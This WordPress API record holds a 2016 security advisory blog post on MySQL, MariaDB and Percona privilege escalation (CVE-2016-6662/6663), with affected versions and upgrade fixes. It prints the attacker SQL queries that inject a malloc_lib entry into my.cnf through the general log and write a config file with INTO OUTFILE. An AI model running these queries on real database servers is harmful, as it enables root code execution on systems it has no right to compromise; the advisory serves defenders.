{"id":204,"date":"2016-11-03T17:05:14","date_gmt":"2016-11-03T17:05:14","guid":{"rendered":"http:\/\/www.urolime.com\/blogs\/in\/?p=204"},"modified":"2021-09-20T10:56:22","modified_gmt":"2021-09-20T05:26:22","slug":"mysql-remote-root-code-execution","status":"publish","type":"post","link":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/","title":{"rendered":"Mysql Remote Root Code Execution"},"content":{"rendered":"<p><strong>Remote Root Code Execution \/ Databse Privilege Escalation:<\/strong><\/p>\n<p><a href=\"http:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-207\" src=\"http:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security-300x225.jpg\" alt=\"database-security\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security-300x225.jpg 300w, https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security-399x300.jpg 399w, https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security.jpg 450w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><br \/>\nSeverity: <strong>Critical<\/strong> CVE-2016-6662 CVE-2016-6663<\/p>\n<p><strong>Privilege Escalation<\/strong> vulnerability is reported. Using this vulnerability, <span id=\"GingerWidget-correction-0\" class=\"correction alternate\">an attacker<\/span> could execute code with root privileges.<\/p>\n<p>Using the REPAIR TABLE SQL statement<span id=\"GingerWidget-correction-0\" class=\"correction alternate\">,<\/span> which have <span id=\"GingerWidget-correction-1\" class=\"correction alternate\">the lowest<\/span> privileged users with SELECT\/CREATE\/INSERT grants, can create a simlink to the database directory( that is \/var\/lib\/mysql). After that they will get the arbitrary code execution in mysql shell.<\/p>\n<p>Affected Databse versions:<\/p>\n<blockquote><p>MariaDB : Earlier versions are affected.<br \/>\n5.5.52<br \/>\n10.1.18<br \/>\n10.0.28<\/p><\/blockquote>\n<blockquote><p>MySQL : Same and earlier versions are affected.<br \/>\n5.5.51<br \/>\n5.6.32<br \/>\n5.7.14<\/p><\/blockquote>\n<blockquote><p>Percona Server : Earlier versions are affected<br \/>\n5.5.51-38.2<br \/>\n5.6.32-78-1<br \/>\n5.7.14-8<\/p><\/blockquote>\n<p>If MySQL config files are owned by mysql then the attacker can append his malicious entries.<\/p>\n<p>Attacker could run the following SQL queries:<\/p>\n<blockquote><p>mysql&gt; set global general_log_file = &#8216;\/etc\/my.cnf&#8217;;<br \/>\nmysql&gt; set global general_log = on;<br \/>\nmysql&gt; select &#8216;<br \/>\n&#8216;&gt;<br \/>\n&#8216;&gt; ; injected config entry<br \/>\n&#8216;&gt;<br \/>\n&#8216;&gt; [mysqld]<br \/>\n&#8216;&gt; malloc_lib=\/tmp\/mysql_exploit_lib.so<br \/>\n&#8216;&gt;<br \/>\n&#8216;&gt; [separator]<br \/>\n&#8216;&gt;<br \/>\n&#8216;&gt; &#8216;;<br \/>\n1 row in set (0.00 sec)<br \/>\nmysql&gt; set global general_log = off;<\/p><\/blockquote>\n<p>And if the mysql config file is not owned by the mysql user , then the attacker can set the config file using the SQL command.<\/p>\n<blockquote><p>SELECT &#8216;malicious config entry&#8217; INTO OUTFILE &#8216;\/var\/lib\/mysql\/my.cnf&#8217;<\/p><\/blockquote>\n<p><strong>FIX:<\/strong><br \/>\nYou need to upgrade the mysql version.<\/p>\n<blockquote><p>MySQL<br \/>\n5.7.15<br \/>\n5.6.33<br \/>\n5.5.52<\/p>\n<p>https:\/\/dev.mysql.com\/doc\/relnotes\/mysql\/5.7\/en\/news-5-7-15.html<br \/>\nhttps:\/\/dev.mysql.com\/doc\/relnotes\/mysql\/5.6\/en\/news-5-6-33.html<br \/>\nhttps:\/\/dev.mysql.com\/doc\/relnotes\/mysql\/5.5\/en\/news-5-5-52.html<\/p><\/blockquote>\n<blockquote><p>MariaDB<br \/>\n5.5.52<br \/>\n10.1.18<br \/>\n10.0.28<br \/>\nhttps:\/\/mariadb.com\/kb\/en\/mdb-5552-rn\/<br \/>\nhttps:\/\/mariadb.com\/kb\/en\/mdb-10118-rn\/<br \/>\nhttps:\/\/mariadb.com\/kb\/en\/mdb-10028-rn\/<\/p><\/blockquote>\n<p>Create an empty my.cnf and .my.cnf in the datadir (usually \/var\/lib\/mysql) and make root the owner\/group with 0644 permissions.<\/p>\n<p><a href=\"https:\/\/www.urolime.com\/\">UROLIME<\/a> is highly recommended to upgrade all your database servers to the latest patched version and make sure attacker is not able to write his malicious code to your Config files.<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p id=\"pvc_stats_204\" class=\"pvc_stats all  \" data-element-id=\"204\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> <img loading=\"lazy\" decoding=\"async\" width=\"16\" height=\"16\" alt=\"Loading\" src=\"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/plugins\/page-views-count\/ajax-loader-2x.gif\" border=0 \/><\/p>\n<div class=\"pvc_clear\"><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Remote Root Code Execution \/ Databse Privilege Escalation: Severity: Critical CVE-2016-6662 CVE-2016-6663 Privilege Escalation vulnerability is reported. Using this vulnerability, an attacker could execute code with root privileges. Using the REPAIR TABLE SQL statement, which have the lowest privileged users with SELECT\/CREATE\/INSERT grants, can create a simlink to the database directory( that is \/var\/lib\/mysql). After [&hellip;]<\/p>\n<div class=\"pvc_clear\"><\/div>\n<p id=\"pvc_stats_204\" class=\"pvc_stats all  \" data-element-id=\"204\" style=\"\"><i class=\"pvc-stats-icon medium\" aria-hidden=\"true\"><svg aria-hidden=\"true\" focusable=\"false\" data-prefix=\"far\" data-icon=\"chart-bar\" role=\"img\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewBox=\"0 0 512 512\" class=\"svg-inline--fa fa-chart-bar fa-w-16 fa-2x\"><path fill=\"currentColor\" d=\"M396.8 352h22.4c6.4 0 12.8-6.4 12.8-12.8V108.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v230.4c0 6.4 6.4 12.8 12.8 12.8zm-192 0h22.4c6.4 0 12.8-6.4 12.8-12.8V140.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v198.4c0 6.4 6.4 12.8 12.8 12.8zm96 0h22.4c6.4 0 12.8-6.4 12.8-12.8V204.8c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v134.4c0 6.4 6.4 12.8 12.8 12.8zM496 400H48V80c0-8.84-7.16-16-16-16H16C7.16 64 0 71.16 0 80v336c0 17.67 14.33 32 32 32h464c8.84 0 16-7.16 16-16v-16c0-8.84-7.16-16-16-16zm-387.2-48h22.4c6.4 0 12.8-6.4 12.8-12.8v-70.4c0-6.4-6.4-12.8-12.8-12.8h-22.4c-6.4 0-12.8 6.4-12.8 12.8v70.4c0 6.4 6.4 12.8 12.8 12.8z\" class=\"\"><\/path><\/svg><\/i> <img loading=\"lazy\" decoding=\"async\" width=\"16\" height=\"16\" alt=\"Loading\" src=\"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/plugins\/page-views-count\/ajax-loader-2x.gif\" border=0 \/><\/p>\n<div class=\"pvc_clear\"><\/div>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"content-type":"","sfsi_plus_gutenberg_text_before_share":"","sfsi_plus_gutenberg_show_text_before_share":"","sfsi_plus_gutenberg_icon_type":"","sfsi_plus_gutenberg_icon_alignemt":"","sfsi_plus_gutenburg_max_per_row":"","footnotes":""},"categories":[1],"tags":[],"class_list":["post-204","post","type-post","status-publish","format-standard","hentry","category-general"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.3.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Mysql Remote Root Code Execution<\/title>\n<meta name=\"description\" content=\"Privilege Escalation vulnerability is reported. Using this vulnerability, an attacker could execute code with root privileges.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Mysql Remote Root Code Execution\" \/>\n<meta property=\"og:description\" content=\"Remote Root Code Execution \/ Databse Privilege Escalation: Severity: Critical CVE-2016-6662 CVE-2016-6663 Privilege Escalation vulnerability is reported. Using this vulnerability, an attacker could execute code with root privileges. Using the REPAIR TABLE SQL statement, which have the lowest privileged users with SELECT\/CREATE\/INSERT grants, can create a simlink to the database directory( that is \/var\/lib\/mysql). After \u2026\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/\" \/>\n<meta property=\"og:site_name\" content=\"Urolime Blogs\" \/>\n<meta property=\"article:published_time\" content=\"2016-11-03T17:05:14+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-09-20T05:26:22+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security-300x225.jpg\" \/>\n<meta name=\"author\" content=\"Urolime Technologies\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Urolime Technologies\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/\"},\"author\":{\"name\":\"Urolime Technologies\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/#\/schema\/person\/c231f59d5f2c2516e0efc6067ee0c22c\"},\"headline\":\"Mysql Remote Root Code Execution\",\"datePublished\":\"2016-11-03T17:05:14+00:00\",\"dateModified\":\"2021-09-20T05:26:22+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/\"},\"wordCount\":346,\"publisher\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security-300x225.jpg\",\"articleSection\":[\"General\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/\",\"url\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/\",\"name\":\"Mysql Remote Root Code Execution\",\"isPartOf\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security-300x225.jpg\",\"datePublished\":\"2016-11-03T17:05:14+00:00\",\"dateModified\":\"2021-09-20T05:26:22+00:00\",\"description\":\"Privilege Escalation vulnerability is reported. Using this vulnerability, an attacker could execute code with root privileges.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#primaryimage\",\"url\":\"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security.jpg\",\"contentUrl\":\"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security.jpg\",\"width\":450,\"height\":338,\"caption\":\"database security\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.urolime.com\/blogs\/in\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Mysql Remote Root Code Execution\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/#website\",\"url\":\"https:\/\/www.urolime.com\/blogs\/in\/\",\"name\":\"Urolime Blogs\",\"description\":\"The place for DevOps, Cloud, Kubernetes News and Updates\",\"publisher\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.urolime.com\/blogs\/in\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/#organization\",\"name\":\"Urolime Blogs\",\"url\":\"https:\/\/www.urolime.com\/blogs\/in\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2021\/06\/cropped-250-x250.jpg\",\"contentUrl\":\"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2021\/06\/cropped-250-x250.jpg\",\"width\":250,\"height\":73,\"caption\":\"Urolime Blogs\"},\"image\":{\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.urolime.com\/blogs\/in\/#\/schema\/person\/c231f59d5f2c2516e0efc6067ee0c22c\",\"name\":\"Urolime Technologies\",\"description\":\"Urolime Technologies has made groundbreaking accomplishments in the field of Google Cloud &amp; Kubernetes Consulting, DevOps Services, 24\/7 Managed Services &amp; Support, Dedicated IT Team, Managed AWS Consulting and Azure Cloud Consulting. We believe our customers are Smart to choose their IT Partner, and we \u201cDo IT Smart\u201d.\",\"sameAs\":[\"https:\/\/www.urolime.com\/\"],\"url\":\"https:\/\/www.urolime.com\/blogs\/in\/author\/blogadmin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mysql Remote Root Code Execution","description":"Privilege Escalation vulnerability is reported. Using this vulnerability, an attacker could execute code with root privileges.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/","og_locale":"en_US","og_type":"article","og_title":"Mysql Remote Root Code Execution","og_description":"Remote Root Code Execution \/ Databse Privilege Escalation: Severity: Critical CVE-2016-6662 CVE-2016-6663 Privilege Escalation vulnerability is reported. Using this vulnerability, an attacker could execute code with root privileges. Using the REPAIR TABLE SQL statement, which have the lowest privileged users with SELECT\/CREATE\/INSERT grants, can create a simlink to the database directory( that is \/var\/lib\/mysql). After \u2026","og_url":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/","og_site_name":"Urolime Blogs","article_published_time":"2016-11-03T17:05:14+00:00","article_modified_time":"2021-09-20T05:26:22+00:00","og_image":[{"url":"http:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security-300x225.jpg","type":"","width":"","height":""}],"author":"Urolime Technologies","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Urolime Technologies","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#article","isPartOf":{"@id":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/"},"author":{"name":"Urolime Technologies","@id":"https:\/\/www.urolime.com\/blogs\/in\/#\/schema\/person\/c231f59d5f2c2516e0efc6067ee0c22c"},"headline":"Mysql Remote Root Code Execution","datePublished":"2016-11-03T17:05:14+00:00","dateModified":"2021-09-20T05:26:22+00:00","mainEntityOfPage":{"@id":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/"},"wordCount":346,"publisher":{"@id":"https:\/\/www.urolime.com\/blogs\/in\/#organization"},"image":{"@id":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#primaryimage"},"thumbnailUrl":"http:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security-300x225.jpg","articleSection":["General"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/","url":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/","name":"Mysql Remote Root Code Execution","isPartOf":{"@id":"https:\/\/www.urolime.com\/blogs\/in\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#primaryimage"},"image":{"@id":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#primaryimage"},"thumbnailUrl":"http:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security-300x225.jpg","datePublished":"2016-11-03T17:05:14+00:00","dateModified":"2021-09-20T05:26:22+00:00","description":"Privilege Escalation vulnerability is reported. Using this vulnerability, an attacker could execute code with root privileges.","breadcrumb":{"@id":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#primaryimage","url":"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security.jpg","contentUrl":"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2016\/11\/database-security.jpg","width":450,"height":338,"caption":"database security"},{"@type":"BreadcrumbList","@id":"https:\/\/www.urolime.com\/blogs\/in\/mysql-remote-root-code-execution\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.urolime.com\/blogs\/in\/"},{"@type":"ListItem","position":2,"name":"Mysql Remote Root Code Execution"}]},{"@type":"WebSite","@id":"https:\/\/www.urolime.com\/blogs\/in\/#website","url":"https:\/\/www.urolime.com\/blogs\/in\/","name":"Urolime Blogs","description":"The place for DevOps, Cloud, Kubernetes News and Updates","publisher":{"@id":"https:\/\/www.urolime.com\/blogs\/in\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.urolime.com\/blogs\/in\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.urolime.com\/blogs\/in\/#organization","name":"Urolime Blogs","url":"https:\/\/www.urolime.com\/blogs\/in\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.urolime.com\/blogs\/in\/#\/schema\/logo\/image\/","url":"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2021\/06\/cropped-250-x250.jpg","contentUrl":"https:\/\/www.urolime.com\/blogs\/in\/wp-content\/uploads\/sites\/9\/2021\/06\/cropped-250-x250.jpg","width":250,"height":73,"caption":"Urolime Blogs"},"image":{"@id":"https:\/\/www.urolime.com\/blogs\/in\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.urolime.com\/blogs\/in\/#\/schema\/person\/c231f59d5f2c2516e0efc6067ee0c22c","name":"Urolime Technologies","description":"Urolime Technologies has made groundbreaking accomplishments in the field of Google Cloud &amp; Kubernetes Consulting, DevOps Services, 24\/7 Managed Services &amp; Support, Dedicated IT Team, Managed AWS Consulting and Azure Cloud Consulting. We believe our customers are Smart to choose their IT Partner, and we \u201cDo IT Smart\u201d.","sameAs":["https:\/\/www.urolime.com\/"],"url":"https:\/\/www.urolime.com\/blogs\/in\/author\/blogadmin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.urolime.com\/blogs\/in\/wp-json\/wp\/v2\/posts\/204","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.urolime.com\/blogs\/in\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.urolime.com\/blogs\/in\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.urolime.com\/blogs\/in\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.urolime.com\/blogs\/in\/wp-json\/wp\/v2\/comments?post=204"}],"version-history":[{"count":6,"href":"https:\/\/www.urolime.com\/blogs\/in\/wp-json\/wp\/v2\/posts\/204\/revisions"}],"predecessor-version":[{"id":2402,"href":"https:\/\/www.urolime.com\/blogs\/in\/wp-json\/wp\/v2\/posts\/204\/revisions\/2402"}],"wp:attachment":[{"href":"https:\/\/www.urolime.com\/blogs\/in\/wp-json\/wp\/v2\/media?parent=204"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.urolime.com\/blogs\/in\/wp-json\/wp\/v2\/categories?post=204"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.urolime.com\/blogs\/in\/wp-json\/wp\/v2\/tags?post=204"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}